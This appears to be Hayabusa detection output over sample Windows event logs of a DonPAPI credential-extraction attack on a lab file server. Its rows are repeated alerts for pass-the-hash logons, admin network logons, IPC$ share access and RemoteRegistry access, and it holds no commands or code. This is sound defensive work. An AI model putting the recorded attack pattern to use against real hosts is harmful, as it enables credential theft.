2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.476 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
